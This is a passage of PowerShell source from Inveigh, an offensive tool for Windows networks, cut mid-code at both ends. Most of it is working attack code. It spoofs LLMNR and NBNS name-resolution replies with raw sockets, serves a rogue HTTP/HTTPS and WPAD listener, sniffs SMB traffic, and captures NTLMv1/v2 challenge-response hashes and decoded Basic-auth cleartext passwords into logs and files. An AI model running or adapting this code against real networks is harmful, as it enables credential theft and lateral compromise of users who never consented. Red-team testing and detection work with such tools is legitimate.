-or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\"))))\n                        {\n                            $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)\n                            $inveigh.console_queue.Add(\"$HTTP_type NTLMv2 challenge/response written to \" + $inveigh.NTLMv2_out_file)\n                        }\n\n                        if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\"))\n                        {\n                            $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\")\n                        }\n\n                    } \n\n                }\n\n                if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)\n                {\n                    $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString)\n                }\n                \n                $inveigh.response.StatusCode = 200\n                $NTLM_auth = $true\n                $NTLM_challenge = ''\n                $HTTP_raw_url_output = $true\n\n            }\n            else\n            {\n                $NTLM = 'NTLM'\n            }\n\n        }\n        elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code\n        {\n            $inveigh.response.StatusCode = 200\n            $Basic_auth = $true\n            $authentication_header = $authentication_header -replace 'Basic ',''\n            $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))\n            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - Basic auth cleartext credentials captured from \" + $inveigh.request.RemoteEndpoint.Address)])\n            $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \",$HTTP_type,$cleartext_credentials\")\n            $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \",$HTTP_type,$cleartext_credentials\")\n            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from \" + $inveigh.request.RemoteEndpoint.Address)\n\n            if($inveigh.file_output)\n            {\n                $inveigh.console_queue.Add(\"$HTTP_type Basic auth cleartext credentials written to \" + $inveigh.cleartext_out_file)\n            }\n                 \n        }\n\n        if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth)\n        {\n\n            if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))\n            {\n                [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))\n            }\n            elseif($inveigh.HTTP_directory)\n            {\n\n                if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')\n                {\n                    [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))\n                }\n                elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))\n                {\n                    [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))\n                }\n                elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat')\n                {\n                    [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)\n                }\n                else\n                {\n\n                    if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))\n                    {\n                        [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))\n                    }\n                    else\n                    {\n                        [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)\n                    }\n            \n                }\n\n            }\n            else\n            {\n\n                if($inveigh.request.RawUrl -match '/wpad.dat')\n                {\n                    $inveigh.message = $inveigh.WPAD_response\n                }\n                elseif($inveigh.HTTP_response)\n                {\n                    $inveigh.message = $inveigh.HTTP_response\n                }\n                else\n                {\n                    $inveigh.message = $null\n                }\n\n                [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)\n            }\n        }\n        else\n        {\n            [Byte[]] $HTTP_buffer = $null\n        }\n\n        if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth)\n        {\n            $inveigh.response.AddHeader(\"WWW-Authenticate\",$NTLM)\n        }\n        elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat'))\n        {\n            $inveigh.response.AddHeader(\"WWW-Authenticate\",\"Basic realm=$HTTPBasicRealm\")\n        }\n        else\n        {\n            $inveigh.response.StatusCode = 200\n        }\n\n        $inveigh.response.ContentLength64 = $HTTP_buffer.Length\n        $HTTP_stream = $inveigh.response.OutputStream\n        $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)\n        $HTTP_stream.Close()\n    }\n\n    $inveigh.HTTP_listener.Stop()\n    $inveigh.HTTP_listener.Close()\n}\n\n# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer\n$sniffer_scriptblock = \n{\n    param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL)\n\n    $byte_in = New-Object System.Byte[] 4\t\n    $byte_out = New-Object System.Byte[] 4\t\n    $byte_data = New-Object System.Byte[] 4096\n    $byte_in[0] = 1\n    $byte_in[1-3] = 0\n    $byte_out[0] = 1\n    $byte_out[1-3] = 0\n    $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)\n    $inveigh.sniffer_socket.SetSocketOption(\"IP\",\"HeaderIncluded\",$true)\n    $inveigh.sniffer_socket.ReceiveBufferSize = 1024\n    $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]\"$IP\",0)\n    $inveigh.sniffer_socket.Bind($end_point)\n    $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)\n    $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)\n    [Array]::Reverse($LLMNR_TTL_bytes)\n    $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)\n    [Array]::Reverse($NBNS_TTL_bytes)\n\n    if($RunTime)\n    {    \n        $sniffer_timeout = new-timespan -Minutes $RunTime\n        $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()\n    }\n\n    while($inveigh.running)\n    {\n        $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)\n        $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data)\n        $binary_reader = New-Object System.IO.BinaryReader($memory_stream)\n        $version_HL = $binary_reader.ReadByte()\n        $type_of_service= $binary_reader.ReadByte()\n        $total_length = DataToUInt16 $binary_reader.ReadBytes(2)\n        $identification = $binary_reader.ReadBytes(2)\n        $flags_offset = $binary_reader.ReadBytes(2)\n        $TTL = $binary_reader.ReadByte()\n        $protocol_number = $binary_reader.ReadByte()\n        $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())\n        $source_IP_bytes = $binary_reader.ReadBytes(4)\n        $source_IP = [System.Net.IPAddress]$source_IP_bytes\n        $destination_IP_bytes = $binary_reader.ReadBytes(4)\n        $destination_IP = [System.Net.IPAddress]$destination_IP_bytes\n        $IP_version = [Int]\"0x$(('{0:X}' -f $version_HL)[0])\"\n        $header_length = [Int]\"0x$(('{0:X}' -f $version_HL)[1])\" * 4\n        \n        switch($protocol_number)\n        {\n\n            6 \n            {  # TCP\n                $source_port = DataToUInt16 $binary_reader.ReadBytes(2)\n                $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)\n                $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4)\n                $ack_number = DataToUInt32 $binary_reader.ReadBytes(12)\n                $TCP_header_length = [Int]\"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])\" * 4\n                $TCP_flags = $binary_reader.ReadByte()\n                $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2)\n                $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())\n                $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2)    \n                $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))\n\n                switch ($destination_port)\n                {\n\n                    139 \n                    {\n                        if($SMB -eq 'Y')\n                        {\n                            SMBNTLMResponse $payload_bytes\n                        }\n                    }\n\n                    445\n                    {\n                     \n                        if($SMB -eq 'Y')\n                        {\n                            SMBNTLMResponse $payload_bytes\n                        }\n                    \n                    }\n\n                }\n\n                # Outgoing packets\n                switch ($source_port)\n                {\n\n                    139 \n                    {\n\n                        if($SMB -eq 'Y')\n                        {   \n                            $NTLM_challenge = SMBNTLMChallenge $payload_bytes\n                        }\n                    \n                    }\n\n                    445 \n                    {\n\n                        if($SMB -eq 'Y')\n                        {   \n                            $NTLM_challenge = SMBNTLMChallenge $payload_bytes\n                        }\n                    \n                    }\n                \n                }\n\n            }\n                \n            17 \n            {  # UDP\n                $source_port =  $binary_reader.ReadBytes(2)\n                $endpoint_source_port = DataToUInt16 ($source_port)\n                $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)\n                $UDP_length = $binary_reader.ReadBytes(2)\n                $UDP_length_uint  = DataToUInt16 ($UDP_length)\n                $binary_reader.ReadBytes(2)\n                $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)\n\n                # Incoming packets \n                switch ($destination_port)\n                {\n\n                    137 # NBNS\n                    {\n                     \n                        if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP)\n                        {\n                            $UDP_length[0] += 16\n                        \n                            $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +\n                                                  $NBNS_TTL_bytes +\n                                                  0x00,0x06,0x00,0x00 +\n                                                  ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +\n                                                  0x00,0x00,0x00,0x00\n                \n                            $NBNS_response_packet = 0x00,0x89 +\n                                                    $source_port[1,0] +\n                                                    $UDP_length[1,0] +\n                                                    0x00,0x00 +\n                                                    $payload_bytes[0,1] +\n                                                    0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +\n                                                    $NBNS_response_data\n                \n                            $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)\n                            $send_socket.SendBufferSize = 1024\n                            $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)\n                            $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])\n                    \n                            switch ($NBNS_query_type)\n                            {\n\n                                '41-41'\n                                {\n                                    $NBNS_query_type = '00'\n                                }\n\n                                '41-44'\n                                {\n                                    $NBNS_query_type = '03'\n                                }\n\n                                '43-41'\n                                {\n                                    $NBNS_query_type = '20'\n                                }\n\n                                '42-4C'\n                                {\n                                    $NBNS_query_type = '1B'\n                                }\n\n                                '42-4D'\n                                {\n                                $NBNS_query_type = '1C'\n                                }\n\n                                '42-4E'\n                                {\n                                $NBNS_query_type = '1D'\n                                }\n\n                                '42-4F'\n                                {\n                                $NBNS_query_type = '1E'\n                                }\n\n                            }\n\n                            $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])\n                            $NBNS_query = $NBNS_query -replace \"-00\",\"\"\n                            $NBNS_query = $NBNS_query.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n                            $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)\n                            $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf(\"CA\"))\n                            $NBNS_query_string_subtracted = \"\"\n                            $NBNS_query_string = \"\"\n                            $n = 0\n                            \n                            do\n                            {\n                                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)\n                                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))\n                                $n += 1\n                            }\n                            until($n -gt ($NBNS_query_string_encoded.Length - 1))\n                    \n                            $n = 0\n                    \n                            do\n                            {\n                                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))\n                                $n += 2\n                            }\n                            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)\n\n                            if($NBNS -eq 'Y')\n                            {\n\n                                if($NBNSTypes -contains $NBNS_query_type)\n                                {\n                                 \n                                    if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString))\n                                    {\n                                        $send_socket.sendTo($NBNS_response_packet,$destination_point)\n                                        $send_socket.Close()\n                                        $NBNS_response_message = \"- spoofed response has been sent\"\n                                    }\n                                    else\n                                    {\n\n                                        if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)\n                                        {\n                                            $NBNS_response_message = \"- $NBNS_query_string is not on reply list\"\n                                        }\n                                        elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)\n                                        {\n                                            $NBNS_response_message = \"- $NBNS_query_string is on ignore list\"\n                                        }\n                                        elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)\n                                        {\n                                            $NBNS_response_message = \"- $source_IP is not on reply list\"\n                                        }\n                                        elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)\n                                        {\n                                            $NBNS_response_message = \"- $source_IP is on ignore list\"\n                                        }\n                                        else\n                                        {\n                                            $NBNS_response_message = \"- not spoofed due to previous capture\"\n                                        }\n                                    \n                                    }\n\n                                }\n                                else\n                                {\n                                    $NBNS_response_message = \"- spoof not sent due to disabled type\"\n                                }\n\n                            }\n\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message\")\n                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message\")])\n                        }\n                    }\n\n                    5355 # LLMNR\n                    {\n\n                        if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c') # ignore AAAA for now\n                        {\n                            $UDP_length[0] += $payload_bytes.Length - 2\n                            $LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]\n\n                            $LLMNR_response_data += $LLMNR_response_data +\n                                                    $LLMNR_TTL_bytes +\n                                                    0x00,0x04 +\n                                                    ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()\n            \n                            $LLMNR_response_packet = 0x14,0xeb +\n                                                     $source_port[1,0] +\n                                                     $UDP_length[1,0] +\n                                                     0x00,0x00 +\n                                                     $payload_bytes[0,1] +\n                                                     0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +\n                                                     $LLMNR_response_data\n                \n                            $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])\n                            $LLMNR_query = $LLMNR_query -replace \"-00\",\"\"\n                            $LLMNR_query = $LLMNR_query.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n                            $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)\n                \n                            if($LLMNR -eq 'Y')\n                            {\n\n                                if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString))\n                                {\n                                    $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )\n                                    $send_socket.SendBufferSize = 1024\n                                    $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) \n                                    $send_socket.SendTo($LLMNR_response_packet,$destination_point)\n                                    $send_socket.Close()\n                                    $LLMNR_response_message = \"- spoofed response has been sent\"\n                                }\n                                else\n                                {\n\n                                    if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)\n                                    {\n                                        $LLMNR_response_message = \"- $LLMNR_query_string is not on reply list\"\n                                    }\n                                    elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)\n                                    {\n                                        $LLMNR_response_message = \"- $LLMNR_query_string is on ignore list\"\n                                    }\n                                    elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)\n                                    {\n                                        $LLMNR_response_message = \"- $source_IP is not on reply list\"\n                                    }\n                                    elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)\n                                    {\n                                        $LLMNR_response_message = \"- $source_IP is on ignore list\"\n                                    }\n                                    else\n                                    {\n                                        $LLMNR_response_message = \"- not spoofed due to previous capture\"\n                                    }\n                                \n                                }\n                            \n                            }\n\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message\")\n                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message\")])\n                        }\n                    }\n\n                }\n            }\n\n        }\n\n        if($RunTime)\n        {\n         \n            if($sniffer_stopwatch.Elapsed -ge $sniffer_timeout)\n            {\n\n                if($inveigh.HTTP_listener.IsListening)\n                {\n                    $inveigh.HTTP_listener.Stop()\n                    $inveigh.HTTP_listener.Close()\n                }\n\n                if($inveigh.relay_running)\n                {\n                    $inveigh.console_queue.Add(\"Inveigh Relay exited due to run time at $(Get-Date -format 's')\")\n                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - Inveigh Relay exited due to run time\")])\n                    Start-Sleep -m 5\n                    $inveigh.relay_running = $false\n                } \n\n                $inveigh.console_queue.Add(\"Inveigh exited due to run time at $(Get-Date -format 's')\")\n                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - Inveigh exited due to run time\")])\n                Start-Sleep -m 5\n                $inveigh.running = $false\n    \n                if($inveigh.HTTPS)\n                {\n                    & \"netsh\" http delete sslcert ipport=0.0.0.0:443 > $null\n        \n                    try\n                    {\n                        $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store(\"My\",\"LocalMachine\")\n                        $certificate_store.Open('ReadWrite')\n                        $certificate = $certificate_store.certificates.Find(\"FindByThumbprint\",$inveigh.certificate_thumbprint,$false)[0]\n                        $certificate_store.Remove($certificate)\n                        $certificate_store.Close()\n                    }\n                    catch\n                    {\n\n                        if($inveigh.status_output)\n                        {\n                            $inveigh.console_queue.Add(\"SSL Certificate Deletion Error - Remove Manually\")\n                        }\n\n                        $inveigh.log.Add(\"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually\")\n\n                        if($inveigh.file_output)\n                        {\n                            \"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually\" | Out-File $Inveigh.log_out_file -Append   \n                        }\n                    \n                    }\n\n                }\n                \n                $inveigh.HTTP = $false\n                $inveigh.HTTPS = $false     \n            }\n        }\n\n        if($inveigh.file_output)\n        {\n            while($inveigh.log_file_queue.Count -gt 0)\n            {\n                $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append\n                $inveigh.log_file_queue.RemoveRange(0,1)\n            }\n\n            while($inveigh.NTLMv1_file_queue.Count -gt 0)\n            {\n                $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append\n                $inveigh.NTLMv1_file_queue.RemoveRange(0,1)\n            }\n\n            while($inveigh.NTLMv2_file_queue.Count -gt 0)\n            {\n                $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append\n                $inveigh.NTLMv2_file_queue.RemoveRange(0,1)\n            }\n\n            while($inveigh.cleartext_file_queue.Count -gt 0)\n            {\n                $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append\n                $inveigh.cleartext_file_queue.RemoveRange(0,1)\n            }\n\n        }\n\n    }\n\n    $binary_reader.Close()\n    $memory_stream.Dispose()\n    $memory_stream.Close()\n}\n\n# End ScriptBlocks\n# Begin Startup Functions\n\n# HTTP/HTTPS Listener Startup Function \nfunction HTTPListener()\n{\n    $inveigh.HTTP_listener = New-Object System.Net.HttpListener\n\n    if($inveigh.HTTP)\n    {\n        $inveigh.HTTP_listener.Prefixes.Add('http://*:80/')\n    }\n\n    if($inveigh.HTTPS)\n    {\n        $inveigh.HTTP_listener.Prefixes.Add('https://*:443/')\n    }\n\n    $inveigh.HTTP_listener.AuthenticationSchemes = \"Anonymous\" \n    $inveigh.HTTP_listener.Start()\n    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()\n    $HTTP_runspace.Open()\n    $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)\n    $HTTP_powershell = [PowerShell]::Create()\n    $HTTP_powershell.Runspace = $HTTP_runspace\n    $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null\n    $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null\n    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument(\n        $HTTPBasicRealm).AddArgument($WPADAuth) > $null\n    $HTTP_powershell.BeginInvoke() > $null\n}\n\n# Sniffer/Spoofer Startup Function\nfunction SnifferSpoofer()\n{\n    $sniffer_runspace = [RunspaceFactory]::CreateRunspace()\n    $sniffer_runspace.Open()\n    $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)\n    $sniffer_powershell = [PowerShell]::Create()\n    $sniffer_powershell.Runspace = $sniffer_runspace\n    $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null\n    $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null\n    $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(\n        $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(\n        $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(\n        $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(\n        $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null\n    $sniffer_powershell.BeginInvoke() > $null\n}\n\n# End Startup Functions\n\n# Startup Enabled Services\n\n# HTTP Server Start\nif(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'N')\n{\n    HTTPListener\n}\n\n# Sniffer/Spoofer Start - always enabled\nSnifferSpoofer\n\nif($inveigh.console_output)\n{\n\n    if($ConsoleStatus)\n    {    \n        $console_status_timeout = new-timespan -Minutes $ConsoleStatus\n        $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()\n    }\n\n    :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))\n    {\n\n        while($inveigh.console_queue.Count -gt 0)\n        {\n\n            if($inveigh.output_stream_only)\n            {\n                Write-Output($inveigh.console_queue[0] + $inveigh.newline)\n                $inveigh.console_queue.RemoveRange(0,1)\n            }\n            else\n            {\n\n                switch -wildcard ($inveigh.console_queue[0])\n                {\n\n                    \"Inveigh *exited *\"\n                    {\n                        Write-Warning $inveigh.console_queue[0]\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                    \"* written to *\"\n                    {\n\n                        if($inveigh.file_output)\n                        {\n                            Write-Warning $inveigh.console_queue[0]\n                        }\n\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                    \"* for relay *\"\n                    {\n                        Write-Warning $inveigh.console_queue[0]\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                    \"*SMB relay *\"\n                    {\n                        Write-Warning $inveigh.console_queue[0]\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                    \"* local administrator *\"\n                    {\n                        Write-Warning $inveigh.console_queue[0]\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                    default\n                    {\n                        Write-Output $inveigh.console_queue[0]\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n\n                } \n\n            }\n\n        }\n\n        if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)\n        {\n            \n            if($inveigh.cleartext_list.Count -gt 0)\n            {\n                Write-Output(\"$(Get-Date -format 's') - Current unique cleartext captures:\" + $inveigh.newline)\n                $inveigh.cleartext_list.Sort()\n\n                foreach($unique_cleartext in $inveigh.cleartext_list)\n                {\n                    if($unique_cleartext -ne $unique_cleartext_last)\n                    {\n                        Write-Output($unique_cleartext + $inveigh.newline)\n                    }\n\n                    $unique_cleartext_last = $unique_cleartext\n                }\n\n                Start-Sleep -m 5\n            }\n            else\n            {\n                Write-Output(\"$(Get-Date -format 's') - No cleartext credentials have been captured\" + $inveigh.newline)\n            }\n            \n            if($inveigh.NTLMv1_list.Count -gt 0)\n            {\n                Write-Output(\"$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:\" + $inveigh.newline)\n                $inveigh.NTLMv1_list.Sort()\n\n                foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)\n                {\n                    $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(\":\",($unique_NTLMv1.IndexOf(\":\") + 2)))\n\n                    if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)\n                    {\n                        Write-Output($unique_NTLMv1 + $inveigh.newline)\n                    }\n\n                    $unique_NTLMv1_account_last = $unique_NTLMv1_account\n                }\n\n                $unique_NTLMv1_account_last = ''\n                Start-Sleep -m 5\n                Write-Output(\"$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:\" + $inveigh.newline)\n\n                foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)\n                {\n                    Write-Output($NTLMv1_username + $inveigh.newline)\n                }\n\n                Start-Sleep -m 5\n            }\n            else\n            {\n                Write-Output(\"$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured\" + $inveigh.newline)\n            }\n\n            if($inveigh.NTLMv2_list.Count -gt 0)\n            {\n                Write-Output(\"$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:\" + $inveigh.newline)\n                $inveigh.NTLMv2_list.Sort()\n\n                foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)\n                {\n                    $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(\":\",($unique_NTLMv2.IndexOf(\":\") + 2)))\n\n                    if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)\n                    {\n                        Write-Output($unique_NTLMv2 + $inveigh.newline)\n                    }\n\n                    $unique_NTLMv2_account_last = $unique_NTLMv2_account\n                }\n\n                $unique_NTLMv2_account_last = ''\n                Start-Sleep -m 5\n                Write-Output(\"$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:\" + $inveigh.newline)\n\n                foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)\n                {\n                    Write-Output($NTLMv2_username + $inveigh.newline)\n                }\n                \n            }\n            else\n            {\n                Write-Output(\"$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured\" + $inveigh.newline)\n           